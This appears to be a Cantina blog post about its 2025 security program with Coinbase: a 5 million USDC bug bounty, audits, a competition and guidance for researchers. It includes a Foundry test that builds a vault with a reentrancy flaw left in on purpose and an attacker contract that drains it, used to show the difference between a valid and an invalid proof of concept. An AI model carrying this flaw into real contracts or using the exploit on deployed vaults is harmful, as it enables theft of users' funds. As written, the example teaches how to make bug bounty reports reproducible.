We could not close 2025 without highlighting the security work Coinbase put into practice this year.

For millions of people and thousands of organizations, Coinbase is the default way to access Web3. It is a publicly listed, regulated organization that operates at global scale, with wallets, custody, Base, and onchain products used every day by retail users, developers, and institutions. When someone holds assets with Coinbase or interacts with Base smart contracts, they are relying on Coinbase’s security model as much as the user interface.

This year, Coinbase and Cantina collaborated on an onchain security program that reflects that responsibility. The work included launching a 5 million USDC bug bounty focused on Coinbase’s onchain products and Base smart contracts, a series of structured smart contract audits, a targeted competition, public guidance for security researchers, and a visible role for Coinbase as a key collaborator on the Web3SOC institutional readiness framework.

The objective is straightforward. Coinbase wants its position as the safest entry point into Web3 to continue to be backed by clear, verifiable, and ongoing security work.

Coinbase’s evolution into onchain infrastructure

Coinbase began as a simple way to buy and sell Bitcoin and has grown into one of the primary infrastructure providers in the Web3 ecosystem.

Today, the organization operates across the onchain ecosystem, for example:

  • Consumer products that allow users to buy, sell, store, and send digital assets.
  • Wallet and custody infrastructure for individuals, organizations, and institutions.
  • Base, an open stack that combines a secure, low-cost Ethereum Layer 2 chain, a social and financial app, and developer tools that work together to unlock a global onchain economy.
  • Institutional offerings that integrate onchain rewards and lending into existing financial and corporate workflows.

This evolution means Coinbase’s onchain security investments support a broad set of participants at once, including retail users, developers, trading firms, protocol teams, and institutional clients. When Coinbase strengthens a Base contract, a staking system, or a wallet integration, the same standard applies across the stack.

The security collaboration with Cantina is designed around that scale. Together we focus on smart contract security as core infrastructure, in the same category as uptime, performance, and regulatory compliance, so Coinbase users and partners can better rely on consistent protections wherever they interact with Coinbase’s products.

Security as a core product commitment

Coinbase maintains dedicated engineering and security teams, follows formal review and change management processes, and invests heavily in secure software development practices.

In 2025, more of this discipline became visible to the broader Web3 security community through:

  • A large onchain bug bounty program with transparent reward tiers.
  • Recurring smart contract audits of key components across the Coinbase and Base stack.
  • Public communication on what Coinbase considers a valid proof of concept and how security submissions are evaluated.
  • Collaboration on Web3SOC.

These steps show how Coinbase translates its brand as a safe gateway into specific, observable security practices around wallets, onchain products, and Base.

Coinbase x Cantina in 2025

5 million USDC onchain bug bounty

On 8 July 2025, Coinbase launched a new onchain bug bounty program on Cantina focused on Coinbase’s onchain products and Base smart contracts.

The key parameters are clear:

  • Maximum reward of five million USDC for critical severity issues.
  • Maximum reward of five hundred thousand USDC for high severity issues.
  • Scope that includes Base, wrapped assets such as cbETH and cbBTC, Basenames, staking contracts, DEX aggregators, and selected new onchain acquisitions.
  • Open participation with no deposits, staking, or financial barriers for researchers.

Each submission is evaluated with production context in mind. Coinbase’s security team, working together with Cantina’s triage specialists, reviews each proof of concept for reproducibility, impact on real deployments, and accurate severity classification.

This structure signals that Coinbase expects continuous external testing of its onchain infrastructure and is prepared to compensate impactful discoveries at a level that matches the importance of these systems.

"Coinbase’s $5M bug bounty program underscores our commitment to securing diverse onchain products through collaboration with the global research community. Partnering with Cantina, we aim to build trust and resilience in Web3 by fostering transparency and proactive engagement."

- Anmol Malhotra, Head of Product Security and Blockchain Security at Coinbase.

Structured smart contract security audits and competition

Alongside the bug bounty, Coinbase and Cantina ran a series of collaborative security reviews and one focused competition during 2025. These engagements covered smart contracts and systems that support significant user and developer activity.

These audits included:

In addition, Coinbase hosted a security competition focused on the EIP-7702 Proxy, with 20,000 USDC in rewards. This competition concentrated research attention on a specific account pattern, an externally owned account delegating its execution to proxy code under EIP-7702, that is relevant for future wallet models and smart account behavior.

These audits and the competition ran inside Cantina’s structured process. Scope and documentation were defined together with Coinbase, security researchers received the context needed to build realistic tests, and findings were assessed based on exploitability and impact in production environments.

The overall pattern is consistent. Coinbase places high impact components into formal security review and keeps those components in the live bug bounty scope, so that testing continues as products evolve.

Enabling researchers with public guidance

The Coinbase and Cantina X Space on proof of concept quality was designed to make the bounty more effective for both Coinbase and the researcher community.

In that session, Alexis Williams, Staff Blockchain Security Engineer at Coinbase, and Harikrishnan Mulackal, CEO of Cantina, shared practical guidance on:

  • How Coinbase analyzes proofs of concept and ties them to real systems.
  • Why deterministic, reproducible tests using Foundry forks and realistic assumptions are required.
  • Common errors that lead to invalid findings, such as misuse of cheat codes or test environments that remove critical context.
  • How to write a concise report that describes the vulnerability, the exploit steps, and the post exploit state in a way that security and engineering teams can act on.
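As an added example, not code from this page, from Coinbase, or from Cantina, the Foundry test below contrasts an invalid proof of concept with a valid one against a constructed toy vault. The ToyRewardsVault, its deliberately planted reentrancy bug, the Reenterer contract, the RPC_URL environment variable and the block number are all constructed for illustration and have no connection to any Coinbase or Base contract. It demonstrates the three points above: pinning a fork for determinism, starting the attacker from a realistic position, and stating the post exploit state explicitly.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

/// Constructed toy target, NOT a Coinbase contract. It pays a caller's reward
/// out before zeroing it, so a reentrant receive() can claim repeatedly.
contract ToyRewardsVault {
    mapping(address => uint256) public rewardOf; // storage slot 0

    function deposit() external payable {
        rewardOf[msg.sender] += msg.value;
    }

    function claim() external {
        uint256 amount = rewardOf[msg.sender];
        require(amount > 0, "nothing to claim");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction before effect
        require(ok, "transfer failed");
        rewardOf[msg.sender] = 0;
    }
}

/// Constructed attacker contract: re-enters claim() while the vault still has funds.
contract Reenterer {
    ToyRewardsVault private immutable vault;

    constructor(ToyRewardsVault v) { vault = v; }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.claim();
    }

    receive() external payable {
        // Keep re-entering until the vault can no longer pay another full reward.
        if (address(vault).balance >= msg.value) {
            vault.claim();
        }
    }
}

contract PocQualityTest is Test {
    ToyRewardsVault internal vault;
    address internal victim = makeAddr("victim");
    address internal attacker = makeAddr("attacker");

    function setUp() public {
        // Against a production target, pin a fork to one block so triage can
        // reproduce the run bit for bit (RPC_URL and the block are hypothetical):
        // vm.createSelectFork(vm.envString("RPC_URL"), 21_000_000);
        vault = new ToyRewardsVault();

        // Pre-existing user funds in the vault.
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vault.deposit{value: 10 ether}();

        // Realistic attacker starting position: 1 ether and no privileges.
        vm.deal(attacker, 1 ether);
    }

    /// INVALID PoC: vm.store rewrites the attacker's reward slot directly, so the
    /// "drain" only proves what the cheatcode was told to write. It passes, which
    /// is exactly why a green test is not evidence on its own.
    function test_invalid_cheatcodeWritesState() public {
        bytes32 slot = keccak256(abi.encode(attacker, uint256(0))); // rewardOf[attacker]
        vm.store(address(vault), slot, bytes32(uint256(10 ether)));
        vm.prank(attacker);
        vault.claim();
        assertEq(attacker.balance, 11 ether);
    }

    /// VALID PoC: the attacker reaches the outcome through public entry points
    /// only, from its own funds, and the post exploit state is asserted.
    function test_valid_reentrancyDrainsVault() public {
        uint256 vaultBefore = address(vault).balance; // 10 ether of victim funds

        vm.startPrank(attacker);
        Reenterer r = new Reenterer(vault);
        r.attack{value: 1 ether}();
        vm.stopPrank();

        // Post exploit state, stated the way a report should state it.
        assertEq(address(vault).balance, 0);
        assertEq(address(r).balance, vaultBefore + 1 ether);
    }
}
```

Run with forge test. Both functions pass, which is the point: the invalid one passes only because vm.store granted the attacker a reward it never earned and removed the exact context a triager needs, while the valid one starts from an unprivileged attacker with 1 ether and ends with the vault empty and the attacker contract holding 11 ether. Against a real target, swap the local deployment for the commented fork line so every run is pinned to the same block.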

By publishing these expectations, Coinbase gives independent researchers the same reference points that internal security engineers use. Combined with the open, deposit free program design, this approach lowers the barrier for new researchers and helps to improve the overall quality of submissions.

The result is a more efficient security pipeline. Researchers can focus on findings that matter in production, Coinbase receives clearer and more reproducible reports, and valid issues progress more quickly from discovery to remediation within Coinbase’s engineering and security workflows.

Coinbase and Web3SOC

In July 2025, Coinbase became a key collaborator on Web3SOC, the institutional readiness framework Cantina is building together with leading Web3 organizations.

Web3SOC provides a structured way to evaluate whether an onchain organization is prepared for institutional scale participation. The framework covers operational practices, financial controls, security processes, and regulatory alignment. It is built for two main use cases:

  • Organizations that want to assess their current level of readiness and identify concrete areas for improvement.
  • Institutions that need a consistent, technically grounded framework for diligence across multiple Web3 partners and infrastructure providers.

Coinbase contributes a broad and practical perspective to this work. As a public company, a major exchange, a wallet provider, an incubator of Base, and a security conscious infrastructure partner, Coinbase understands how control environments, incident response, and segregation of duties need to function in real onchain systems.

For institutions evaluating Web3 infrastructure, Coinbase’s role in Web3SOC is an important signal. The organization is not only operating secure products and wallets, it is also contributing directly to the standards that will govern institutional engagement with Web3.

What 2025 means for 2026

The 2025 Coinbase and Cantina security program illustrates a model that other large Web3 infrastructure organizations can adopt.

Organizations building or expanding onchain products in 2026 will be evaluated against this landscape. Those that match the visibility, scale, and structure of Coinbase’s program will be in a stronger position when stakeholders ask how onchain risk is being managed.

Coinbase’s path shows how a global exchange and wallet provider can describe safety in concrete terms that developers, users, and institutions can understand. Public rewards, structured audits, clear expectations for researchers, and institutional frameworks all reinforce its role as the safest and most trusted entry point into Web3.

Closing

As more organizations adopt this level of transparency and structure around onchain security, the overall standard for the ecosystem will rise. Cantina’s role is to help design, operate, and refine these programs so they deliver reliable protection under real conditions.

If you are planning a large scale bug bounty, building an institutional onchain security program, or preparing to demonstrate security readiness, contact our team and we will help you scope, test, and harden your security model.
